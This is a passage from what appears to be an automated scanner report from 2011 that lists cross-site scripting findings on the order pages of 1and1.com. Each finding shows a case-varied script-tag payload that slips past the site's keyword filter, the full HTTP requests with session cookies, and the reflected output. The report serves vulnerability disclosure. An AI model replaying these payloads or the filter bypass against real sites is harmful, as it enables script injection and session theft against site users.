GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:14 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=fYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyEhIB4cNTg=; Expires=Fri, 07-Apr-2079 21:08:22 GMT; Path=/
ETag: dafe46acb36a9f556844954eae96d32c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63338


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
pfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="CloudDynamicServer";UNOUNO.params.lastpage="CloudDynamicServerbe5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

2.2. http://order.1and1.com/xml/order/DomaininfoMove [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/DomaininfoMove is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/DomaininfoMove. The payload d1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 was submitted in the REST URL parameter 3. This input was returned as d1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 in a subsequent request for the URL /xml/order/DomaininfoMove.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/DomaininfoMoved1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:26 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:38:33 GMT; Path=/
ETag: c7593eca9d95d112a774e3b42a8bf63f
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24356


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="DomaininfoMove";UNOUNO.params.lastpage="DomaininfoMoved1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.3. http://order.1and1.com/xml/order/Eshops [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Eshops is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Eshops. The payload f145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5 was submitted in the REST URL parameter 3. This input was returned as f145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5 in a subsequent request for the URL /xml/order/Eshops.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/Eshopsf145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:48:28 GMT; Path=/
ETag: 425493d0f8ed0f19e7a04c07ddd3cc38
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64275


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
F99CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Eshops";UNOUNO.params.lastpage="Eshopsf145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.4. http://order.1and1.com/xml/order/FeatureDatabaseDatabase [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDatabaseDatabase

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureDatabaseDatabase is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureDatabaseDatabase. The payload 9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0 was submitted in the REST URL parameter 3. This input was returned as 9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0 in a subsequent request for the URL /xml/order/FeatureDatabaseDatabase.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/FeatureDatabaseDatabase9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:40:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=LcWY2OTowWVlZU2ZcYylhWygaO3RnYTlQQz0lKSYmJSMlIyAgIyIcHyMtLy4tKk89aV5gbiYoI1MsVmUrHh8bGjYyMDMxKzMqKTJqazEmLV1mLB8gHBsgNDE0LzIzLC0=; Expires=Fri, 07-Apr-2079 21:55:00 GMT; Path=/
ETag: 53f791f92af4dbedadc8055ee2452240
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17973


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureDatabaseDatabase";UNOUNO.params.lastpage="FeatureDatabaseDatabase9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.5. http://order.1and1.com/xml/order/FeatureEmailEmail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailEmail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailEmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailEmail. The payload f6a45</ScRiPt%20>ca9d9974f55 was submitted in the REST URL parameter 3. This input was returned as f6a45</ScRiPt >ca9d9974f55 in a subsequent request for the URL /xml/order/FeatureEmailEmail.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/FeatureEmailEmailf6a45</ScRiPt%20>ca9d9974f55;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:30 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=obmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:55:37 GMT; Path=/
ETag: 242b6a1e5eeabc95b2abaab00ee5cf77
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19175


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureEmailEmail";UNOUNO.params.lastpage="FeatureEmailEmailf6a45</ScRiPt >ca9d9974f55";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.6. http://order.1and1.com/xml/order/FeatureEmailWebmail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureEmailWebmail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailWebmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailWebmail. The payload 45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 was submitted in the REST URL parameter 3. This input was returned as 45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 in a subsequent request for the URL /xml/order/FeatureEmailWebmail.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/FeatureEmailWebmail45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:41:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ObmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:56:00 GMT; Path=/
ETag: 3a27e5470d1c0301a5f75b92d0fc9df4
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16817


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureEmailWebmail";UNOUNO.params.lastpage="FeatureEmailWebmail45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.7. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureGuaranteeMoneyback is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureGuaranteeMoneyback. The payload 83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d was submitted in the REST URL parameter 3. This input was returned as 83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d in a subsequent request for the URL /xml/order/FeatureGuaranteeMoneyback.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/FeatureGuaranteeMoneyback83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
